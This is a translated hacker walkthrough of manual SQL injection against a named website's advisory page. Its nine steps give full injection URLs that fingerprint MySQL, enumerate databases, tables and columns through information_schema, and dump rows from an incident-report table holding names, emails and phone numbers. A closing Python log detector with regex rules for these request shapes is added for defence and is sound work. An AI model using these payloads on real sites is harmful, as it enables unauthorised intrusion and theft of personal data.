1. Determine the version: http://www.qqkiss.tk/document/advisory/detail.php?id=7 and ord(mid(version(), >51) returns the normal page, which means the version is greater than 4.0 and union queries are supported.
2. Guess the number of columns. This can be done with order by, or by trying union select with one column count after another:
http://www.qqkiss.tk/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--
3. View the database version and current user: http://www.qqkiss.tk/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
The database version is 5.1.35. It is said that MySQL versions above 4.1 support the concat function; I do not know whether that is true, and leave it to the experts to look into.
4. Determine whether there is write access
http://www.qqkiss.tk/document/advisory/detail.php?id=7 and (select count(*) from mysql.user)>0-- returns an error, so there is no write permission.
Nothing else for it: the tables have to be guessed manually.
5. List the databases. Previously this was done with union select 1,2,3,schema_name,5,6,n from information_schema.schemata limit 0,1
But this injection point is a little disappointing and that statement cannot be used, so I studied a Turkish hacker's technique instead. Without further ado, it is as follows:
http://www.qqkiss.tk/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5b78786f6f5d,group_concat(distinct+table_schema),0x5b78786f6f5d),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
All databases were detected successfully; foreign hackers are something else. The databases are as follows:
information_schema,advisory,ir,mad,member,mysql,twcert,vuldb,vulscandb
6. Dump the table names; the database dumped here is twcert
http://www.qqkiss.tk/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5b78786f6f5d,group_concat(distinct+table_name),0x5b78786f6f5d),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
This dumps the following tables:
Downloadfile,irsys,newsdata,secrpt,secrpt_big5
7. Dump the column names; the table dumped this time is irsys
http://www.qqkiss.tk/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5b78786f6f5d,group_concat(distinct+column_name),0x5b78786f6f5d),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
This dumps the following columns:
Ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,Status
8. Query the number of entries. At this step, few hackers in this country query the count; they query directly with limit n,1 and keep increasing n until an error occurs.
http://www.qqkiss.tk/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5b78786f6f5d,concat(count(*)),0x5b78786f6f5d),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
The result is 3, which means there are 3 entries in each column.
9. Dump the field contents
http://www.qqkiss.tk/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5b78786f6f5d,name,0x5b78786f6f5d),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+limit+0,1--
This dumps the first entry in the name column.
http://www.qqkiss.tk/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5b78786f6f5d,name,0x5b78786f6f5d),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+limit+1,1--
This dumps the second entry in the name column.
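The requests in steps 2 to 9 leave a recognisable trail in web-server access logs. The following detector is an added example, not part of the original write-up: it URL-decodes each query string, matches the request shapes used above, and decodes hex literals so an analyst can see which schema or table was being enumerated. The rule names, log lines and client addresses are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Rule names are this example's own; the patterns mirror the payloads in the steps above.
RULES = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\s*\.", re.I),
    "mysql_user_probe": re.compile(r"\bfrom\s+mysql\s*\.\s*user\b", re.I),
    "fingerprint_func": re.compile(r"\b(?:version|user)\s*\(\s*\)", re.I),
    "group_concat": re.compile(r"\bgroup_concat\s*\(", re.I),
    "trailing_comment": re.compile(r"--\s*$"),
}
FALSE_GUARD = re.compile(r"\band\s+(\d+)\s*=\s*(\d+)", re.I)   # and 2=4, and 1=0
HEX_LITERAL = re.compile(r"\b0x((?:[0-9a-f]{2})+)\b", re.I)   # 0x747763657274
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) \S+?\?(\S*) HTTP/')

def analyze(raw_query):
    """Return (sorted rule names, decoded hex literals) for one query string."""
    q = unquote_plus(raw_query)              # '+' and %xx back to plain text
    hits = {name for name, rx in RULES.items() if rx.search(q)}
    if any(int(a) != int(b) for a, b in FALSE_GUARD.findall(q)):
        hits.add("always_false_guard")       # empties the original result set
    literals = [bytes.fromhex(h).decode("latin-1") for h in HEX_LITERAL.findall(q)]
    return sorted(hits), literals

def scan(lines, threshold=2):
    """Yield (client, rules, literals) for log lines matching >= threshold rules."""
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        rules, literals = analyze(m.group(2))
        if len(rules) >= threshold:
            yield m.group(1), rules, literals

# Constructed access-log lines (documentation IP range, made-up timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /document/advisory/detail.php?id=7 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Jan/2024:10:02:11 +0000] "GET /document/advisory/detail.php?id=7+and+2=4+union+select+1,user(),version(),4,5,6,7,8,9-- HTTP/1.1" 200 5230',
    '192.0.2.44 - - [01/Jan/2024:10:05:40 +0000] "GET /document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5b78786f6f5d,group_concat(distinct+table_name),0x5b78786f6f5d),'
    '-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274-- HTTP/1.1" 200 5301',
]

if __name__ == "__main__":
    for client, rules, literals in scan(SAMPLE_LOG):
        print(client, rules, literals)
```

The decoded literals show the `[xxoo]` output delimiter and the targeted schema name, which helps scope what was read during an incident.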
PHP Manual Injection